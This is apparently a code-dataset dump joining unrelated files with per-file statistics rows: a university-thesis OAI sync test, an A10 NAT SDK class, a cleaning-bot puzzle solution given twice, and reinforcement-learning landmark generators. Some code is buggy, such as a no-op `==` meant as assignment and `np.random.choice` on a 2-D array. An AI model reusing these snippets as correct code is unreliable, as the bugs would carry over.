"/uk/faculty-abbr",
"/uk/degree-discipline",
"/uk/degree-program",
"/uk/publication-place",
"uk/file-availability",
"/bundles",
"/others/handle",
"/others/lastModifyDate",
"/repository"
}
sync = OAISynchronizer(
uk_provider,
parser_name="xoai",
unhandled_paths=unhandled_paths,
create_record=nusl_theses.create_draft_record,
update_record=nusl_theses.update_draft_record,
delete_record=nusl_theses.delete_draft_record,
pid_type="dnusl",
validation=nusl_theses.validate,
oai_identifiers=["oai:dspace.cuni.cz:20.500.11956/111006"]
)
sync.run()
def test_transformer_uk_sample(app, uk_db, schemas):
uk_provider = OAIProvider.query.filter_by(code="uk").one_or_none()
constant_fields = {
"provider": {"$ref": "http://127.0.0.1:5000/api/taxonomies/institutions/00216208/"},
"accessRights": {"$ref": "http://127.0.0.1:5000/api/taxonomies/accessRights/c_abf2/"},
"accessibility": [{"lang": "cze", "value": "Dostupné v digitálním repozitáři UK."}, {
"lang": "eng", "value": "Available in the Charles University Digital Repository."
}]
}
if not uk_provider:
uk_provider = OAIProvider(
code="uk",
description="Univerzita Karlova",
oai_endpoint="https://dspace.cuni.cz/oai/nusl",
set_="nusl_set",
metadata_prefix="xoai",
constant_fields=constant_fields
)
db.session.add(uk_provider)
db.session.commit()
unhandled_paths = {
"/dc/date/accessioned",
"/dc/date/available",
"/dc/date/issued",
"/dc/identifier/repId",
"/dc/identifier/aleph",
"/dc/description/provenance",
"/dc/description/department",
"/dc/description/faculty",
"/dc/language/cs_CZ",
"/dc/publisher",
"/dcterms/created",
"/thesis/degree/name",
"/thesis/degree/program",
"/thesis/degree/level",
"/uk/abstract",
"/uk/thesis",
"/uk/taxonomy",
"/uk/faculty-name",
"/uk/faculty-abbr",
"/uk/degree-discipline",
"/uk/degree-program",
"/uk/publication-place",
"uk/file-availability",
"/bundles",
"/others/handle",
"/others/lastModifyDate",
"/repository"
}
sync = OAISynchronizer(
uk_provider,
parser_name="xoai",
unhandled_paths=unhandled_paths,
create_record=nusl_theses.create_draft_record,
update_record=nusl_theses.update_draft_record,
delete_record=nusl_theses.delete_draft_record,
pid_type="dnusl",
validation=nusl_theses.validate,
oai_identifiers=["oai:dspace.cuni.cz:20.500.11956/4434"]
)
sync.run()
| 34.398496
| 94
| 0.598907
| 487
| 4,575
| 5.437372
| 0.268994
| 0.037764
| 0.036254
| 0.016616
| 0.927492
| 0.927492
| 0.903323
| 0.903323
| 0.903323
| 0.903323
| 0
| 0.025799
| 0.254426
| 4,575
| 132
| 95
| 34.659091
| 0.750513
| 0
| 0
| 0.873016
| 0
| 0
| 0.375956
| 0.086557
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015873
| false
| 0
| 0.031746
| 0
| 0.047619
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5a7a9128d3a85846426e2da96f80ff5c7ce97b4d
| 11,908
|
py
|
Python
|
a10sdk/core/cgnv6/cgnv6_fixed_nat_inside.py
|
deepfield/a10sdk-python
|
bfaa58099f51f085d5e91652d1d1a3fd5c529d5d
|
[
"Apache-2.0"
] | 16
|
2015-05-20T07:26:30.000Z
|
2021-01-23T11:56:57.000Z
|
a10sdk/core/cgnv6/cgnv6_fixed_nat_inside.py
|
deepfield/a10sdk-python
|
bfaa58099f51f085d5e91652d1d1a3fd5c529d5d
|
[
"Apache-2.0"
] | 6
|
2015-03-24T22:07:11.000Z
|
2017-03-28T21:31:18.000Z
|
a10sdk/core/cgnv6/cgnv6_fixed_nat_inside.py
|
deepfield/a10sdk-python
|
bfaa58099f51f085d5e91652d1d1a3fd5c529d5d
|
[
"Apache-2.0"
] | 23
|
2015-03-29T15:43:01.000Z
|
2021-06-02T17:12:01.000Z
|
from a10sdk.common.A10BaseClass import A10BaseClass
class Inside(A10BaseClass):
"""Class Description::
Fixed NAT Inside Users.
Class inside supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param iplist_list: {"minItems": 1, "items": {"type": "iplist"}, "uniqueItems": true, "array": [{"required": ["inside-ip-list", "partition"], "properties": {"ports-per-user": {"description": "Configure Ports per Inside User (ports-per-user)", "format": "number", "type": "number", "maximum": 64512, "minimum": 1, "optional": true}, "vrid": {"description": "VRRP-A vrid (Specify ha VRRP-A vrid)", "format": "number", "type": "number", "maximum": 31, "minimum": 1, "optional": true}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "nat-end-address": {"optional": true, "type": "string", "description": "IPv4 End NAT Address", "format": "ipv4-address"}, "partition": {"description": "Inside User Partition (Partition Name)", "partition-visibility": "shared", "minLength": 1, "format": "string", "optional": false, "maxLength": 63, "type": "string"}, "nat-netmask": {"optional": true, "type": "string", "description": "NAT Addresses IP Netmask", "format": "ipv4-netmask"}, "inside-ip-list": {"description": "Name of IP List used to specify Inside Users", "format": "string-rlx", "minLength": 1, "optional": false, "maxLength": 63, "type": "string"}, "session-quota": {"description": "Configure per user quota on sessions", "format": "number", "type": "number", "maximum": 2147483647, "minimum": 1, "optional": true}, "usable-nat-ports": {"type": "object", "properties": {"usable-start-port": {"description": "Start Port of Usable NAT Ports", "minimum": 1024, "type": "number", "maximum": 65535, "format": "number"}, "usable-end-port": {"description": "End Port of Usable NAT Ports", "minimum": 1024, "type": "number", "maximum": 65535, "format": "number"}}}, "nat-start-address": {"optional": true, "type": "string", "description": "Start NAT Address", "format": "ipv4-address"}, "nat-ip-list": {"description": "Name of IP List used to specify NAT addresses", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 63, "type": "string"}, "offset": {"type": "object", "properties": {"numeric-offset": {"description": "Configure a numeric offset to the first NAT IP address", "format": "number", "default": 0, "maximum": 1024000, "minimum": 0, "not": "random", "type": "number"}, "random": {"default": 0, "not": "numeric-offset", "type": "number", "description": "Randomly choose the first NAT IP address", "format": "flag"}}}, "respond-to-user-mac": {"default": 0, "optional": true, "type": "number", "description": "Use the user's source MAC for the next hop rather than the routing table (Default: off)", "format": "flag"}, "method": {"description": "'use-all-nat-ips': Use all the NAT IP addresses configured; 'use-least-nat-ips': Use the least number of NAT IP addresses required (default); ", "format": "enum", "default": "use-least-nat-ips", "type": "string", "enum": ["use-all-nat-ips", "use-least-nat-ips"], "optional": true}, "dest-rule-list": {"description": "Bind destination based Rule-List (Fixed NAT Rule-List Name)", "format": "string", "minLength": 1, "optional": true, "maxLength": 63, "type": "string"}, "dynamic-pool-size": {"description": "Configure size of Dynamic pool (Default: 0)", "format": "number", "default": 0, "optional": true, "maximum": 64511, "minimum": 0, "type": "number"}}}], "type": "array", "$ref": "/axapi/v3/cgnv6/fixed-nat/inside/iplist/{inside-ip-list}+{partition}"}
:param ipv4address_list: {"minItems": 1, "items": {"type": "ipv4address"}, "uniqueItems": true, "array": [{"required": ["inside-start-address", "inside-end-address", "inside-netmask", "partition"], "properties": {"ports-per-user": {"description": "Configure Ports per Inside User (ports-per-user)", "format": "number", "type": "number", "maximum": 64512, "minimum": 1, "optional": true}, "vrid": {"description": "VRRP-A vrid (Specify ha VRRP-A vrid)", "format": "number", "type": "number", "maximum": 31, "minimum": 1, "optional": true}, "inside-netmask": {"optional": false, "type": "string", "description": "IPv4 Netmask", "format": "ipv4-netmask-brief"}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "nat-end-address": {"optional": true, "type": "string", "description": "IPv4 End NAT Address", "format": "ipv4-address"}, "usable-nat-ports": {"type": "object", "properties": {"usable-start-port": {"description": "Start Port of Usable NAT Ports", "minimum": 1024, "type": "number", "maximum": 65535, "format": "number"}, "usable-end-port": {"description": "End Port of Usable NAT Ports", "minimum": 1024, "type": "number", "maximum": 65535, "format": "number"}}}, "partition": {"description": "Inside User Partition (Partition Name)", "partition-visibility": "shared", "minLength": 1, "format": "string", "optional": false, "maxLength": 63, "type": "string"}, "nat-netmask": {"optional": true, "type": "string", "description": "NAT Addresses IP Netmask", "format": "ipv4-netmask-brief"}, "session-quota": {"description": "Configure per user quota on sessions", "format": "number", "type": "number", "maximum": 2147483647, "minimum": 1, "optional": true}, "method": {"description": "'use-all-nat-ips': Use all the NAT IP addresses configured; 'use-least-nat-ips': Use the least number of NAT IP addresses required (default); ", "format": "enum", "default": "use-least-nat-ips", "type": "string", "enum": ["use-all-nat-ips", "use-least-nat-ips"], "optional": true}, "inside-start-address": {"optional": false, "type": "string", "description": "IPv4 Inside User Start Address", "format": "ipv4-address"}, "nat-start-address": {"optional": true, "type": "string", "description": "Start NAT Address", "format": "ipv4-address"}, "nat-ip-list": {"description": "Name of IP List used to specify NAT addresses", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 63, "type": "string"}, "offset": {"type": "object", "properties": {"numeric-offset": {"description": "Configure a numeric offset to the first NAT IP address", "format": "number", "default": 0, "maximum": 1024000, "minimum": 0, "not": "random", "type": "number"}, "random": {"default": 0, "not": "numeric-offset", "type": "number", "description": "Randomly choose the first NAT IP address", "format": "flag"}}}, "respond-to-user-mac": {"default": 0, "optional": true, "type": "number", "description": "Use the user's source MAC for the next hop rather than the routing table (Default: off)", "format": "flag"}, "inside-end-address": {"optional": false, "type": "string", "description": "IPv4 Inside User End Address", "format": "ipv4-address"}, "dest-rule-list": {"description": "Bind destination based Rule-List (Fixed NAT Rule-List Name)", "format": "string", "minLength": 1, "optional": true, "maxLength": 63, "type": "string"}, "dynamic-pool-size": {"description": "Configure size of Dynamic pool (Default: 0)", "format": "number", "default": 0, "optional": true, "maximum": 64511, "minimum": 0, "type": "number"}}}], "type": "array", "$ref": "/axapi/v3/cgnv6/fixed-nat/inside/ipv4address/{inside-start-address}+{inside-end-address}+{inside-netmask}+{partition}"}
:param ipv6address_list: {"minItems": 1, "items": {"type": "ipv6address"}, "uniqueItems": true, "array": [{"required": ["inside-start-address", "inside-end-address", "inside-netmask", "partition"], "properties": {"ports-per-user": {"description": "Configure Ports per Inside User (ports-per-user)", "format": "number", "type": "number", "maximum": 64512, "minimum": 1, "optional": true}, "vrid": {"description": "VRRP-A vrid (Specify ha VRRP-A vrid)", "format": "number", "type": "number", "maximum": 31, "minimum": 1, "optional": true}, "inside-netmask": {"description": "Inside User IPv6 Netmask", "format": "number", "type": "number", "maximum": 128, "minimum": 64, "optional": false}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "nat-end-address": {"optional": true, "type": "string", "description": "IPv6 End NAT Address", "format": "ipv4-address"}, "usable-nat-ports": {"type": "object", "properties": {"usable-start-port": {"description": "Start Port of Usable NAT Ports", "minimum": 1024, "type": "number", "maximum": 65535, "format": "number"}, "usable-end-port": {"description": "End Port of Usable NAT Ports", "minimum": 1024, "type": "number", "maximum": 65535, "format": "number"}}}, "partition": {"description": "Inside User Partition (Partition Name)", "partition-visibility": "shared", "minLength": 1, "format": "string", "optional": false, "maxLength": 63, "type": "string"}, "nat-netmask": {"optional": true, "type": "string", "description": "NAT Addresses IP Netmask", "format": "ipv4-netmask-brief"}, "session-quota": {"description": "Configure per user quota on sessions", "format": "number", "type": "number", "maximum": 2147483647, "minimum": 1, "optional": true}, "method": {"description": "'use-all-nat-ips': Use all the NAT IP addresses configured; 'use-least-nat-ips': Use the least number of NAT IP addresses required (default); ", "format": "enum", "default": "use-least-nat-ips", "type": "string", "enum": ["use-all-nat-ips", "use-least-nat-ips"], "optional": true}, "inside-start-address": {"optional": false, "type": "string", "description": "IPv6 Inside User Start Address", "format": "ipv6-address"}, "nat-start-address": {"optional": true, "type": "string", "description": "Start NAT Address", "format": "ipv4-address"}, "nat-ip-list": {"description": "Name of IP List used to specify NAT addresses", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 63, "type": "string"}, "offset": {"type": "object", "properties": {"numeric-offset": {"description": "Configure a numeric offset to the first NAT IP address", "format": "number", "default": 0, "maximum": 1024000, "minimum": 0, "not": "random", "type": "number"}, "random": {"default": 0, "not": "numeric-offset", "type": "number", "description": "Randomly choose the first NAT IP address", "format": "flag"}}}, "respond-to-user-mac": {"default": 0, "optional": true, "type": "number", "description": "Use the user's source MAC for the next hop rather than the routing table (Default: off)", "format": "flag"}, "inside-end-address": {"optional": false, "type": "string", "description": "IPv6 Inside User End Address", "format": "ipv6-address"}, "dest-rule-list": {"description": "Bind destination based Rule-List (Fixed NAT Rule-List Name)", "format": "string", "minLength": 1, "optional": true, "maxLength": 63, "type": "string"}, "dynamic-pool-size": {"description": "Configure size of Dynamic pool (Default: 0)", "format": "number", "default": 0, "optional": true, "maximum": 64511, "minimum": 0, "type": "number"}}}], "type": "array", "$ref": "/axapi/v3/cgnv6/fixed-nat/inside/ipv6address/{inside-start-address}+{inside-end-address}+{inside-netmask}+{partition}"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/cgnv6/fixed-nat/inside`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "inside"
self.a10_url="/axapi/v3/cgnv6/fixed-nat/inside"
self.DeviceProxy = ""
self.iplist_list = []
self.ipv4address_list = []
self.ipv6address_list = []
for keys, value in kwargs.items():
setattr(self,keys, value)
| 297.7
| 3,794
| 0.658885
| 1,484
| 11,908
| 5.277628
| 0.103774
| 0.055158
| 0.029877
| 0.02809
| 0.908069
| 0.878703
| 0.859678
| 0.859678
| 0.859678
| 0.852528
| 0
| 0.026038
| 0.116308
| 11,908
| 39
| 3,795
| 305.333333
| 0.718236
| 0.954484
| 0
| 0
| 0
| 0
| 0.079665
| 0.067086
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.076923
| 0
| 0.230769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ce46596d3a133d297d8a17b580c6fc6447b58d97
| 3,146
|
py
|
Python
|
CleaningBot_newcode.py
|
crazybiceps/Cleaning-Bot
|
c34606d12c74cdca026b6aa1b1f30f275cd49730
|
[
"Apache-2.0"
] | null | null | null |
CleaningBot_newcode.py
|
crazybiceps/Cleaning-Bot
|
c34606d12c74cdca026b6aa1b1f30f275cd49730
|
[
"Apache-2.0"
] | null | null | null |
CleaningBot_newcode.py
|
crazybiceps/Cleaning-Bot
|
c34606d12c74cdca026b6aa1b1f30f275cd49730
|
[
"Apache-2.0"
] | null | null | null |
# Head ends here
def next_move(posr, posc, board):
p = 0
q = 0
dmin = 0
dmax = 0
position = 0
for i in range(5) :
count = 0
for j in range(5) :
if board[i][j] == "d" :
count += 1
if count == 1 :
dmax = dmin = j
elif count > 1 :
dmax = j
if count > 0 :
for l in range(dmin , dmax + 1):
if position < dmin :
for k in range(position , dmin , 1) :
print("RIGHT")
position = k + 1
elif position > dmin :
for k in range(position , dmin , -1) :
if board[i][k] == "d" :
print("CLEAN")
board[i][k] == "-"
print("LEFT")
position = k - 1
elif position == dmin :
print("CLEAN")
board[i][dmin] = "-"
if dmin != dmax :
position += 1
print("RIGHT")
if i != 4 :
print("DOWN")
# Tail starts here
if __name__ == "__main__":
pos = [int(i) for i in input().strip().split()]
board = [[j for j in input().strip()] for i in range(5)]
next_move(pos[0], pos[1], board)
# Slight Changes in the above code
# Head ends here
def next_move(posr, posc, board):
p = 0
q = 0
dmin = 0
dmax = 0
position = 0
for i in range(5) :
count = 0
for j in range(5) :
if board[i][j] == "d" :
count += 1
if count == 1 :
dmax = dmin = j
elif count > 1 :
dmax = j
if count > 0 :
for l in range(dmin , dmax + 1):
if position < dmin :
for k in range(position , dmin , 1) :
print("RIGHT")
position = k + 1
if position > dmin :
for k in range(position , dmin , -1) :
if board[i][k] == "d" :
print("CLEAN")
board[i][k] == "-"
print("LEFT")
position = k - 1
if position == dmin :
print("CLEAN")
board[i][dmin] = "-"
if dmin != dmax :
position += 1
print("RIGHT")
if i != 4 :
print("DOWN")
# Tail starts here
if __name__ == "__main__":
pos = [int(i) for i in input().strip().split()]
board = [[j for j in input().strip()] for i in range(5)]
next_move(pos[0], pos[1], board)
| 27.840708
| 60
| 0.327718
| 312
| 3,146
| 3.240385
| 0.153846
| 0.083086
| 0.035608
| 0.043521
| 0.973294
| 0.973294
| 0.963403
| 0.963403
| 0.963403
| 0.963403
| 0
| 0.032401
| 0.568341
| 3,146
| 112
| 61
| 28.089286
| 0.712077
| 0.030515
| 0
| 0.95
| 0
| 0
| 0.02629
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025
| false
| 0
| 0
| 0
| 0.025
| 0.15
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ce7d8511ca46810e745188dd99bc57f1ce317c91
| 49,357
|
py
|
Python
|
stable_baselines/common/landmark_generator.py
|
spitis/stable-baselines
|
f62cd6698b2427c0fb5ac452b9059a59b22cde81
|
[
"MIT"
] | null | null | null |
stable_baselines/common/landmark_generator.py
|
spitis/stable-baselines
|
f62cd6698b2427c0fb5ac452b9059a59b22cde81
|
[
"MIT"
] | 2
|
2018-11-14T22:53:17.000Z
|
2018-11-15T00:06:40.000Z
|
stable_baselines/common/landmark_generator.py
|
spitis/stable-baselines
|
f62cd6698b2427c0fb5ac452b9059a59b22cde81
|
[
"MIT"
] | null | null | null |
import numpy as np, tensorflow as tf, os, cloudpickle
import tensorflow_probability as tfp
from stable_baselines.common.replay_buffer import ReplayBuffer
from stable_baselines.common import tf_util
from abc import ABC, abstractmethod
import faiss
class AbstractLandmarkGenerator(ABC):
"""
Defines interface for landmark generators
"""
def __init__(self, buffer_size, env, _init_setup_model=True):
self.buffer_size = buffer_size
self.env = env
self.ac_space = self.env.action_space
self.ob_space = self.env.observation_space.spaces['observation']
self.goal_space = self.env.observation_space.spaces['achieved_goal']
if not self.env.goal_extraction_function:
raise ValueError("Environment must have goal_extraction_function method")
self.goal_extraction_function = self.env.goal_extraction_function
self.states = None
self.landmark_states = None
self.goals = None
self.use_actions = False
self.actions = None
self.sess = None
self.index = None
def _setup_model(self):
pass
@abstractmethod
def add_state_data(self, states, achieved_goals):
"""
Processes state / achieved_goal data.
"""
raise NotImplementedError
@abstractmethod
def add_landmark_experience_data(self, states, actions, landmarks, desired_goals, additional):
"""
Processes state / action / landmark / goal data.
"""
raise NotImplementedError
@abstractmethod
def generate(self, states, actions, goals):
"""Generates landmarks for states and goals (and optionally, actions).
:param states: (batch_size * state_dim vector)
:param states: (batch_size * action_dim vector)
:param goals: (batch_size * goal_dim vector)
:return landmarks: (tuple of (landmark_states, landmark_goals))
"""
raise NotImplementedError
@abstractmethod
def assign_scores(self, scores, ratios):
"""Assigns scores to the landmarks previously generated by generate method."""
raise NotImplementedError
@staticmethod
def _save_to_file(save_path, data=None, params=None):
_, ext = os.path.splitext(save_path)
if ext == "":
save_path += ".pkl"
with open(save_path, "wb") as file:
cloudpickle.dump((data, params), file)
@staticmethod
def _load_from_file(load_path):
if not os.path.exists(load_path):
if os.path.exists(load_path + ".pkl"):
load_path += ".pkl"
else:
raise ValueError(
"Error: the file {} could not be found".format(load_path))
with open(load_path, "rb") as file:
data, params = cloudpickle.load(file)
return data, params
@abstractmethod
def save(self, save_path):
"""
Save the current parameters to file
:param save_path: (str) the save location
"""
# self._save_to_file(save_path, data={}, params=None)
raise NotImplementedError()
@classmethod
def load(cls, load_path, env=None, **kwargs):
data, params = cls._load_from_file(load_path)
model = cls(buffer_size=data["buffer_size"], env=data['env'], _init_setup_model=False)
model.__dict__.update(data)
model.__dict__.update(kwargs)
model._setup_model()
if model.sess is not None:
restores = []
for param, loaded_p in zip(model.params, params):
restores.append(param.assign(loaded_p))
model.sess.run(restores)
if model.index is not None:
index_filename = load_path + '.faiss_idx'
model.index = faiss.read_index(index_filename)
return model
class RandomLandmarkGenerator(AbstractLandmarkGenerator):
def __init__(self, buffer_size, env, _init_setup_model=True):
super().__init__(buffer_size, env, _init_setup_model=True)
self.state_buffer = ReplayBuffer(self.buffer_size, [("state", self.ob_space.shape)])
if self.goal_extraction_function is None:
raise ValueError("Random generator requires a goal_extraction function!")
def add_state_data(self, states, goals):
self.state_buffer.add_batch(states)
def add_landmark_experience_data(self, states, actions, landmarks, desired_goals, additional=None):
# Does nothing with landmark experiences
pass
def generate(self, states, actions, goals):
# Does not use actions
self.landmark_states = landmark_states = self.state_buffer.sample(len(states))[0]
landmark_goals = self.goal_extraction_function(landmark_states)
self.states = states
self.actions = actions
self.goals = goals
return landmark_states, landmark_goals
def assign_scores(self, scores, ratios):
# Do Nothing (random generator does not learn)
pass
def __len__(self):
return len(self.state_buffer)
def save(self, save_path):
"""
Save the current parameters to file
:param save_path: (str) the save location
"""
# self._save_to_file(save_path, data={}, params=None)
data = {
"state_buffer": self.state_buffer,
"ac_space": self.ac_space,
"ob_space": self.ob_space,
"goal_space": self.goal_space,
"goal_extraction_function": self.goal_extraction_function,
"env": self.env
}
self._save_to_file(save_path, data=data, params=None)
class NearestNeighborLandmarkGenerator(AbstractLandmarkGenerator):
def __init__(self, buffer_size, env, epsilon=0.3, time_scale=0.000001, score_cutoff=0.96, threshold_nn_size=1000, max_size=200000, _init_setup_model=True):
super().__init__(buffer_size, env, _init_setup_model=True)
self.state_buffer = ReplayBuffer(self.buffer_size, [("state", self.ob_space.shape)])
self.state_buffer = ReplayBuffer(self.buffer_size, [("state", self.ob_space.shape)])
self.landmark_buffer = ReplayBuffer(self.buffer_size, [("state", self.ob_space.shape),
("action", self.ac_space.shape),
("landmark", self.ob_space.shape),
("desired_goal", self.goal_space.shape)
])
self.d = self.ob_space.shape[-1] + self.goal_space.shape[-1] + 1
self.index = faiss.IndexFlatL2(self.d)
self.score_cutoff = score_cutoff
self.time_scale = time_scale
self.epsilon = epsilon
self.threshold_nn_size = threshold_nn_size
self.landmarks = np.zeros((0, self.ob_space.shape[-1]))
self.time = 0.
self.max_size = max_size
if self.goal_extraction_function is None:
raise ValueError("Random generator requires a goal_extraction function!")
def add_state_data(self, states, goals):
self.state_buffer.add_batch(states)
def add_landmark_experience_data(self, states, actions, landmarks, desired_goals, additional=None):
self.landmark_buffer.add_batch(states, actions, landmarks, desired_goals)
def generate(self, states, actions, goals):
self.states = states
self.actions = actions
self.goals = goals
nn_size = self.index.ntotal
if nn_size > self.max_size:
#prune half of the nn database
self.index.remove_ids(faiss.IDSelectorRange(0, self.max_size//2))
self.landmarks = self.landmarks[self.max_size//2:]
nn_size = self.index.ntotal
assert(len(self.landmarks) == nn_size)
if nn_size < self.threshold_nn_size:
self.landmark_states = landmark_states = self.state_buffer.sample(len(states))[0]
else:
num_random = int(self.epsilon * len(states))
random_landmarks = self.state_buffer.sample(num_random)[0]
time_feature = np.ones((len(states)-num_random,1)) * self.time
query = np.concatenate([states[num_random:], goals[num_random:], time_feature], 1).astype('float32')
_, lidxs = self.index.search(query, 1)
genned_landmarks = self.landmarks[lidxs[:,0]]
self.landmark_states = landmark_states = np.concatenate((random_landmarks, genned_landmarks), 0)
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
def assign_scores(self, scores, ratios):
# Do Nothing (random generator does not learn)
self.time += self.time_scale
time_feature = np.ones((len(self.states),1)) * self.time
values = np.concatenate((self.states, self.goals, time_feature), 1)
saved_idxs = np.squeeze(np.argwhere(scores > self.score_cutoff),1)
saved_values = values[saved_idxs]
saved_landmarks = self.landmark_states[saved_idxs]
self.index.add(saved_values.astype('float32'))
self.landmarks = np.concatenate((self.landmarks, saved_landmarks), 0)
def __len__(self):
return self.index.ntotal
def save(self, save_path):
"""
Save the current parameters to file
:param save_path: (str) the save location
"""
# self._save_to_file(save_path, data={}, params=None)
data = {
"state_buffer": self.state_buffer,
"landmark_buffer": self.landmark_buffer,
"d": self.d,
"score_cutoff": self.score_cutoff,
"time_scale": self.time_scale,
"epsilon": self.epsilon,
"threshold_nn_size": self.threshold_nn_size,
"landmarks": self.landmarks,
"time": self.time,
"max_size": self.max_size,
"ac_space": self.ac_space,
"ob_space": self.ob_space,
"goal_space": self.goal_space,
"goal_extraction_function": self.goal_extraction_function,
"env": self.env
}
index_filename = save_path + '.faiss_idx'
faiss.write_index(self.index, index_filename)
self._save_to_file(save_path, data=data, params=None)
class NonScoreBasedVAEWithNNRefinement(AbstractLandmarkGenerator):
def __init__(self, buffer_size, env, refine_with_NN=False, use_actions=True, batch_size=128, num_training_steps=100, learning_threshold=100, max_nn_index_size=200000, _init_setup_model=True):
super().__init__(buffer_size, env, _init_setup_model=True)
self.refine_with_NN = refine_with_NN
self.use_actions = use_actions
self.hidden_dim = 400
self.z_dim = 50
self.batch_size = batch_size
self.num_training_steps = num_training_steps
self.learning_threshold = learning_threshold
self.max_nn_index_size = max_nn_index_size
if self.goal_extraction_function is None:
raise ValueError("NonScoreBasedVAEWithNNRefinement requires a goal_extraction function!")
self.steps = 0
## Replay Buffers ##
self.landmarks = np.zeros((0, self.ob_space.shape[-1]))
self.landmark_buffer = ReplayBuffer(self.buffer_size, [("state", self.ob_space.shape),
("action", self.ac_space.shape),
("landmark", self.ob_space.shape),
("desired_goal", self.goal_space.shape)
])
## NN Index ##
self.d = self.ob_space.shape[-1]
self.index = faiss.IndexFlatL2(self.d)
if _init_setup_model:
self._setup_model()
def _setup_model(self):
## CVAE Graph ##
self.graph = tf.Graph()
with self.graph.as_default():
self.sess = tf_util.make_session(graph=self.graph)
with tf.variable_scope("lervae"):
sag_len = self.ob_space.shape[-1] + self.goal_space.shape[-1]
if self.use_actions:
sag_len += self.ac_space.shape[-1]
state_action_goal = tf.placeholder(tf.float32, [None, sag_len], name='sag_placeholder')
landmark = tf.placeholder(tf.float32, [None, self.ob_space.shape[-1]], name='lm_placeholder')
# encoder
h = tf.layers.dense(tf.concat([state_action_goal, landmark], axis=1), self.hidden_dim, activation=tf.nn.relu)
h = tf.layers.dense(h, self.hidden_dim, activation=tf.nn.relu)
mu = tf.layers.dense(h, self.z_dim)
log_variance = tf.layers.dense(h, self.z_dim)
z = tf.random_normal(shape=tf.shape(mu)) * tf.sqrt(tf.exp(log_variance)) + mu
# decoder
h = tf.layers.dense(tf.concat([state_action_goal, z], axis=1), self.hidden_dim, activation=tf.nn.relu)
h = tf.layers.dense(h, self.hidden_dim, activation=tf.nn.relu)
generated_landmark = tf.layers.dense(h, self.ob_space.shape[-1])
# Distortion is the negative log likelihood: P(X|z,c)
l2_loss = tf.reduce_sum(tf.squared_difference(landmark, generated_landmark), 1)
tf.summary.scalar("VAE_distortion_l2Loss", tf.reduce_mean(l2_loss))
# The rate is the D_KL(Q(z|X,y)||P(z|c))
latent_loss = -0.5*tf.reduce_sum(1.0 + log_variance - tf.square(mu) - tf.exp(log_variance), 1)
tf.summary.scalar("VAE_rate_LatentLoss", tf.reduce_mean(latent_loss))
loss = tf.reduce_mean(l2_loss + latent_loss)
tf.summary.scalar("VAE_elbo", loss)
opt = tf.train.AdamOptimizer()
gradients = opt.compute_gradients(loss, var_list=tf.trainable_variables())
for i, (grad, var) in enumerate(gradients):
if grad is not None:
gradients[i] = (tf.clip_by_norm(grad, 1.), var)
ts = opt.apply_gradients(gradients)
init = tf.global_variables_initializer()
self.summary = tf.summary.merge_all()
self.params = tf.global_variables("lervae")
self.sess.run(init)
self.g = {
'sag_ph': state_action_goal,
'lm_ph': landmark,
'z': z,
'generated_landmark': generated_landmark,
'loss': loss,
'ts': ts,
'summary': self.summary
}
def add_state_data(self, states, goals):
"""Add state data to buffer (for initial random generation), and also to NN Index"""
self.landmarks = np.concatenate((self.landmarks, states), 0)
self.index.add(states.astype('float32'))
nn_size = self.index.ntotal
if nn_size > self.max_nn_index_size:
#prune half of the nn database
#I verified that this works as intended: when we remove ids from faiss, all ids get bumped up.
self.index.remove_ids(faiss.IDSelectorRange(0, self.max_nn_index_size//2))
self.landmarks = self.landmarks[self.max_nn_index_size//2:]
nn_size = self.index.ntotal
assert(len(self.landmarks) == nn_size)
def add_landmark_experience_data(self, states, actions, landmarks, desired_goals, additional=None):
self.landmark_buffer.add_batch(states, actions, landmarks, desired_goals)
loss = 0
# run some training steps
for _ in range(self.num_training_steps):
self.steps +=1
s, a, l, g = self.landmark_buffer.sample(self.batch_size)
if self.use_actions:
feed_dict = {self.g['sag_ph']: np.concatenate((s, a, g), axis=1),
self.g['lm_ph']: l}
else:
feed_dict = {self.g['sag_ph']: np.concatenate((s, g), axis=1),
self.g['lm_ph']: l}
_, loss_, summary = self.sess.run([self.g['ts'], self.g['loss'], self.g['summary']], feed_dict=feed_dict)
loss += loss_
if self.steps % 100 == 0:
print("Landmark CVAE step {}: loss {}".format(self.steps, loss / self.num_training_steps))
return summary
def generate(self, states, actions, goals):
self.states = states
self.actions = actions
self.goals = goals
# Generate randomly at first
if self.steps < self.learning_threshold:
self.landmark_states = landmark_states = np.random.choice(self.landmarks, size=len(states))
landmark_goals = self.goal_extraction_function(landmark_states)
return landmark_states, landmark_goals
